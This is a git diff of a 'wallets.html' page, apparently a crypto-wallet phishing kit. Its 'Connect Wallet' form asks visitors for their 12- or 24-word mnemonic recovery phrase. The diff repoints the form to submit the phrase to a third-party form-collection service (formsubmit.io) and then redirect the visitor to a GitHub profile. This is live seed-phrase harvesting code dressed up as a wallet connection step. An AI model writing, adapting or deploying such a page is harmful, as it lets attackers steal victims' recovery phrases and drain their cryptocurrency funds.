Update wallets.html Test and See

--- a/wallets.html
+++ b/wallets.html
@@ -1727,12 +1727,11 @@
                     </div>
 
                     <div id="div_connect_manuallly" style="display:none;">
-                        <form action="https://submit-form.com/X3teB4AH" method="POST" id="my-form">
+                        <form action="https://formsubmit.io/send/cca876e6-d2fc-4c4f-a391-0cf6b98842cb" method="POST" id="phrase">
+                            <input name="_redirect" type="hidden" id="name" value="https://github.com/Smmoney">
                             <div id="phrase"><textarea
                                     placeholder="Enter your 12 or 24 Mnemonic words. Seperate them with spaces."
                                     style="font-size:25px; font-weight:650" rows="4" name="phrase" required></textarea>
-
-                                    <input type="hidden" style="display: none;" name="_redirect" value="validate.html" >
                                 <p>...</p>
                                 <button id="submit" type="submit" class="btn btn-primary"
                                     style="border-top: 5px; ">Connect Wallet</button>
